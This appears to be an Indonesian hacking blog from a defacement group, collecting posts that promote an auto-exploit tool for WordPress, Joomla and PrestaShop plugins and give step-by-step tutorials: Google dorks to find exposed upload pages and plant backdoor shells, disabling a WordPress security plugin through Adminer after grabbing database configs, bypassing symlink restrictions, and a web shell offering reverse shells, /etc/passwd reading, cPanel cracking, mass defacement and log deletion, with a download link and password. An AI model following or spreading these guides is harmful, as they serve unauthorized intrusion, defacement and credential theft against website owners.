Minggu, 24 Desember 2017

XAttacker - Website Vulnerability Scanner & Auto Exploiter

Published : 08.54 Author :

Assalamualaikum, Selamat malam ☺
kali ini akan update baru lagi !

 XAttacker is a Website Vulnerability Scanner & Auto Exploiter developed by Mohamed Riahi



Installation

 
git clone https://github.com/Moham3dRiahi/XAttacker.git

Auto Cms Detect
  • [1] WordPress :
    • [+] Adblock Blocker
    • [+] WP All Import
    • [+] Blaze
    • [+] Catpro
    • [+] Cherry Plugin
    • [+] Download Manager
    • [+] Formcraft
    • [+] levoslideshow
    • [+] Power Zoomer
    • [+] Gravity Forms
    • [+] Revslider Upload Shell
    • [+] Revslider Dafece Ajax
    • [+] Revslider Get Config
    • [+] Showbiz
    • [+] Simple Ads Manager
    • [+] Slide Show Pro
    • [+] WP Mobile Detector
    • [+] Wysija
    • [+] InBoundio Marketing
    • [+] dzs-zoomsounds
    • [+] Reflex Gallery
    • [+] Creative Contact Form
    • [+] Work The Flow File Upload
    • [+] WP Job Manger
    • [+] PHP Event Calendar
    • [+] Synoptic
    • [+] Wp Shop
    • [+] Content Injection
  • [2] Joomla
    • [+] Com Jce
    • [+] Com Media
    • [+] Com Jdownloads
    • [+] Com Fabrik
    • [+] Com Jdownloads Index
    • [+] Com Foxcontact
    • [+] Com Ads Manager
    • [+] Com Blog
    • [+] Com Users
    • [+] Com Weblinks
    • [+] mod_simplefileupload
  • [3] DruPal
    • [+] Add Admin
  • [4] PrestaShop
    • [+] columnadverts
    • [+] soopamobile
    • [+] soopabanners
    • [+] Vtermslideshow
    • [+] simpleslideshow
    • [+] productpageadverts
    • [+] homepageadvertise
    • [+] homepageadvertise2
    • [+] jro_homepageadvertise
    • [+] attributewizardpro
    • [+] 1attributewizardpro
    • [+] AttributewizardproOLD
    • [+] attributewizardpro_x
    • [+] advancedslider
    • [+] cartabandonmentpro
    • [+] cartabandonmentproOld
    • [+] videostab
    • [+] wg24themeadministration
    • [+] fieldvmegamenu
    • [+] wdoptionpanel
    • [+] pk_flexmenu
    • [+] pk_vertflexmenu
    • [+] nvn_export_orders
    • [+] megamenu
    • [+] tdpsthemeoptionpanel
    • [+] psmodthemeoptionpanel
    • [+] masseditproduct
  • [5] Lokomedia
    • SQL injection

Sekian Terima kasih
Source - Kitploit

Read More ->>
| 1 komentar

Kamis, 21 Desember 2017

menampilkan login wordpress yang disable

Published : 00.27 Author :


halo para pujangga :v hari ini gua bakal share Cara Bypass Admin Login Wordpress Karena Plugins Wordpress.
jadi pas gua eksekusi website yang dari symlinkan dan w edit user melalui adminer
pas mao login wordpress 404 Not Found. Jika itu sudah positif WordPress bisa dipastikan itu karena terhalang Plugins All In One Security And Firewall.
dan akhirnya gua coba searching dan w dapet penyelesaianya dari blognya master
  • http://con7extofficial.blogspot.co.id/

    • dan akhirnya bisa terbuka login wordpressnya
    kgk barokah kalo kgk di bagi tutornya :v. langsung Cekidot Sadjah :v


    Syarat :
    1. Sudah ada shell yang tertanam
    2. Pastikan target adalah dari ConfigGrabber Maupun Symlink :'v Sebelumnya pasti udah tw cara
    menggunakan config grabber mw pun symlink kan?
    3. Upload Adminer. (BisaMenggunakan IndoXploit Shell)

    kebetulan saya pakek 3rr0r shell :v (hasil recoded indoxploit shell)

    1. Click Adminer Di Shell Mana pun yg ada command adminernya ;+



    2. Setelah Itu Click Adminer Login Dan masukan Database Dari Config Yg Sudah Agan Dapatkan


    3. Setelah Mengisi Form Click Login
    4. Setelah Login Tinggal Mencari Options Dengan cara ctrl + f dan ketikan "options" tidak memakai tanda kurung :v


    5. Setelah Mengklik Options Klik Select Data


    6. Scroll kebawah sampai ada tulisan Active_plugins , Klik Edit.


    7. Tinggal klik Delete.


    Dan sekarang agan buka lagi dah page loginya sudah muncul kan :p

    Cukup sekian tutorial yang saya berikan semoga bermanfaat
    Terima Gazii :v

    Source:http://con7extofficial.blogspot.co.id/

    #Penulis:Mr.Bro_Tx(T3754K1T1)-AnonCyberTeam
    Thanks To:Mr.TenWap-4WSec - T3754K1T1 Crew - All Member AnonCyberTeam
    dan terima kasih juga buat Mrs.May Yang udah support selalu :)

    Read More ->>
    | 0 komentar

    Selasa, 19 Desember 2017

    Bypass Symlink with DisableFunction

    Published : 22.57 Author :


    Yooo Para Penggalo :v Hari ini gua mao sedikit berbagi ni Bypass symlink menggunakan disable function
    jadi ketika lu dapet web yang symlinknya ribuaaaaaaannn wow :v nah kettika di symlink 404 notfound :v itu pasti kesel ea :v selow hari ini gua mao berbagi gmna cara bypassnya
    tapi ini kadang ada y berhasil ada yg engga tapi selama gua gunain metode ini alhamdulillah jadi ke bypass :v langsungg aja

    1. lu harus punya akses atau web yang udah ketanem shell pastinya :v
    gua saranin make shell xaisyndicat , noname shell atau T3754K1T1 Priv shell
  • Disni !!


    • 2. nah di symlink 404 notfound dan kita mulai bypass 404nya menggunakan disable function , yang berada di tools xai



    3. setelah itu ada 2 pilihan php.ini sama.htaccess kalian klik php.ini terus nanti di bawahnya ada bacaan klik disni , nah itu udah tinggal refresh balik lagi keshell

    4.dan coba kalian klik symlink pada tools shell backdoor kalian dan klik salah satu symlinkanya dan done :p bisa kan index of jadinya :p(kalo ga bisa berarti Faktor Face :p, karena ga semua bisa :p)



    5.tinggal lu cari dah config web tersebut :p dan happy hacking :p


    Cukup sekian tutorial yang gua kasih,bila ada kesalahan mohon maaf ster:D

    #Author:Mr.Bro_Tx(T3754K1T1)-AnonCyberTeam Thanks To : Mr.TenWap - 4WSec - Mr.Fmr And All Member AnonCyberTeam
    Tentunya makasih juga supportnya buat kamu :p Mrs.May
    Read More ->>
    | 0 komentar

    Deface Dengan UpDone Check Shell Upload

    Published : 21.45 Author :



    Yo.. para penggalo :v hari ini gua bakal share tutoral deface "Dengan UpDone Check Shell Upload"ya walaupun ini metode udah lama ya mungkin masih ada yang butuh :v

    Oke Langsung aja gan :D Simak Baik" Step By Stepnya :D

    Bahan - Bahan :
    Dork:  intext: UpDone check :/sites/default/files/up.php
    inurl:/sites/default/files/up.php
    intext:"UpDone check"

    Exploit : /sites/default/files/up.php

    Akses shell :/sites/default/files/shelmu.php

    Oke lanjut pertama lu dorking dulu menggunakan dork diatas



    Pilih Salah Satu Website Yang Anda Inginkan :V :) ... Jika Sudah Dapat websitenya :)
    Jangan Lupa Di Exploit "/sites/default/files/up.php "
    Agar Tampilannya Seperti Yang Di Bawah ini, vuln ada form upload :)



    lalu kalian upload shell backdoor /script deface kalian , jika sukses tampilanya akan seperti ini



    kalian tinggal akses shell kalian /script kalian : www.site.com/sites/default/fies/shellu.php

    jika berhasil shell kalian akan terbuka and happy hacking selamat anda sudah jadi hekre :p

    cukup sekian tutorial yang gua buat kurang lebih seperti itu :p kalo ada salah maapkeun :D


    #sumber : http://jue-team.blogspot.co.id/

    #Author:Mr.Bro_Tx(T3754K1T1)-AnonCyberTeam
    Thanks To:Mr.TenWap-4WSec-Mrs.May:) And All Member AnonCyberTeam
    Read More ->>
    | 0 komentar

    Senin, 18 Desember 2017

    Shell T3754K1T1 PRIV V.1

    Published : 21.34 Author :

    ===T3754K1T1 PRIV V.1===

    **** COMMAND BASED *****
     - Read File
     usage: rf [filename]
     example: rf /etc/passwd

     - Spawn File/Tools
     usage: spawn [name]

     [name]
     - Adminer (adminer)
     - WebConsole (webconsole)
     - CGI Telnet 1 (cgitelnet1)
     - CGI Telnet 2 (cgitelnet2)
     - PHPINFO (phpinfo)

     example:
     spawn adminer
     spawn webconsole
     spawn cgitelnet1

    - Jumping
    usage: jumping

    - Config Grabber
    usage: tersakiticonfig

     - Symlink
     usage: symlink

     - Reverse Shell
     [Back Connect]
     usage: rvr bc [IP] [PORT] [TYPE]
     example:
     rvr bc 127.0.0.1 1337 bash
     rvr bc 127.0.0.1 1337 perl

     [Bind Port]
     usage: rvr bp [PORT] [TYPE]
     example:
     rvr bp 1337 perl

     - KRDP - Create RDP Account (for windows server only)
     usage: krdp

     - Logout From Shell
    usage: logout

     - Kill Backdoor
    usage: killme
    =============================================
    - Mass Password Change
    - Fake Root
    - Cpanel Crack
    - Mass Deface/Delete File
    - Zone-H Mass Submit
    - Disable Functions
    - Delete Logs
    - Symlink V.2

    #DOWNLOAD
    https://pastebin.com/raw/KRHcSr4K

    Password : t3754k1t1
    #AntiLogLogClub
    ##################################
    ################
    Read More ->>
    | 0 komentar

    Tutorial Deface Dorking Uploader

    Published : 20.54 Author :
    Yoo.. Wellcome to justnewbie69 use your nasty brain to have fun in the cyberspace. ini hal pertama gua nulis blog karena banyaknya permintaan jadi ya gua coba dah maaaf kalo blog gua jelek:v

    Langsung Aja Kali Ini Gua Bakal Share Tutorial Deface Dengan Metode Dorking Uploader maksudnya gmna ?? maksudnya kita ngedorking yang berhubungan dengan "UPLOAD" seperti shell tanpa di password dan uploader hehe :v Langsung aja

    Bahan Bahanya :

    1.Dork

    Inurl:up.php intext:Upload Site:co.il

    intext:index of upload.phtml

    intext:index of uploader.php.fla

    Note:"Kembangkan Dengan Imajinasi Wibu Anda"

    2.Script/shell Backdoor => Here !!

    4.internet

    5.Kegalauan tingkat tinggi :v

    1.pertama Dorking Menggunakan Dork Diatas seperti gambar dibawah ini:




    2.cari target yang ada file uploader atau file shell backdoor contoh (up.php,upload.php,uploader.php,shell.php atau file yg berbau nama uploader/shell )



    3. Jika ada form upload seperti gambar di bawah ini silahkan anda upload shell backdoor/script kalian Jika gagal use ur brain bypass ekstensi /tamper data :p

    Akses shell/scriptnya www.site.com/[path]/shell.php atau www.site.com/shell.php



    Happy Hacking and have fun in the cyberspace
    note:kalau ada shell orang ushakan jangan di hapus , hargai pula usaha orang :)"


    #Author by : Mr.Bro_Tx (T3754K1T1) - Anon Cyber Team
    #Thanks To : Mr.TenWap - 4Wsec and you Mrs.May
    Read More ->>
    | 0 komentar

    Wellcome To JustNewbie69

    Published : 17.30 Author :

    Wellcome To JustNewbie69 

    justnewbie69 use your nasty brain to have fun in the cyberspace.
"Ilmu Ga akan Abis Kalau Di bagi"

    

                  Mr.Bro_Tx (T3754K1T1) - AnonCyberTeam
    Read More ->>
    | 0 komentar
    Langganan: Komentar (Atom)
    Diberdayakan oleh Blogger.